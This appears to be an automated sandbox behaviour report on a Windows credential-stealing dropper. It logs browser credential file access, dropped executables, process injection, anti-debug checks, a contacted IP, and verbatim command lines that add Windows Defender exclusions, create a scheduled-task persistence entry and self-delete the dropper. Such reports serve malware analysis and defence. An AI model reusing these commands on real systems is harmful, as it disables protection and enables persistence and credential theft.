NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (4 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\fl.exe
file	C:\Users\test22\AppData\Local\Temp\svchost32.exe

Creates a shortcut to an executable file (2 events)

file	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (16 events)

cmdline	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
cmdline	cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe"
cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
cmdline	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
cmdline	cmd /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
cmdline	C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
cmdline	cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
cmdline	powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
cmdline	C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
cmdline	"C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe"
cmdline	"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
cmdline	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\fl.exe
file	C:\Users\test22\AppData\Local\Temp\svchost32.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Sept. 14, 2021, 4:14 p.m.	thread_identifier: 1468 thread_handle: 0x00000000000001f4 process_identifier: 2088 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000001fc	1	1
ShellExecuteExW Sept. 14, 2021, 4:15 p.m.	show_type: 0 filepath_r: cmd parameters: /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\fl.exe" filepath: cmd	1	1
ShellExecuteExW Sept. 14, 2021, 4:15 p.m.	show_type: 0 filepath_r: cmd parameters: /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit filepath: cmd	1	1
ShellExecuteExW Sept. 14, 2021, 4:15 p.m.	show_type: 0 filepath_r: C:\Windows\system32\services32.exe parameters: filepath: C:\Windows\System32\services32.exe	1	1
ShellExecuteExW Sept. 14, 2021, 4:15 p.m.	show_type: 0 filepath_r: cmd parameters: /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe" filepath: cmd	1	1
CreateProcessInternalW Sept. 14, 2021, 4:15 p.m.	thread_identifier: 2620 thread_handle: 0x00000000000001f4 process_identifier: 2248 current_directory: C:\Windows\system32 filepath: track: 1 command_line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000001fc	1	1
ShellExecuteExW Sept. 14, 2021, 4:16 p.m.	show_type: 0 filepath_r: cmd parameters: /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe" filepath: cmd	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 14, 2021, 4:14 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (7 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Sept. 14, 2021, 4:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2021, 4:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2021, 4:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2021, 4:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2021, 4:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2021, 4:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Sept. 14, 2021, 4:16 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000020c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: AddressBook base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: Connection Manager base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: DirectDrawEx base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: EditPlus base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: ENTERPRISE base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: Fontcore base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: Google Chrome base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: IE40 base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: IE4Data base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: IE5BAKEX base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: IEData base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: MobileOptionPack base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: SchedulingAgent base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: WIC base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Sept. 14, 2021, 4:14 p.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x0000020c key_handle: 0x0000063c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
cmdline	cmd /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
cmdline	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"

Communicates with host for which no DNS query was performed (1 event)

host

51.254.69.209

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 139264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000214	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Sept. 14, 2021, 4:14 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (3 events)

cmdline	cmd /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
cmdline	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
cmdline	schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL/5và0¸îÅ à@ RÇ@ÅOàÔÈèÅ H.textü· ¸ `.rsrcÔà¼@@.relocÄ@B base_address: 0x00400000 process_identifier: 2076 process_handle: 0x00000214	1	1
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: P8hÔàDD4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¤StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.08InternalNameSmuggle.exe(LegalCopyright @OriginalFilenameSmuggle.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0äâêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0041e000 process_identifier: 2076 process_handle: 0x00000214	1	1
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: Àð5 base_address: 0x00420000 process_identifier: 2076 process_handle: 0x00000214	1	1
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2076 process_handle: 0x00000214	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 14, 2021, 4:14 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL/5và0¸îÅ à@ RÇ@ÅOàÔÈèÅ H.textü· ¸ `.rsrcÔà¼@@.relocÄ@B base_address: 0x00400000 process_identifier: 2076 process_handle: 0x00000214	1	1	0

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Sept. 14, 2021, 4:14 p.m.	key_handle: 0x0000063c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
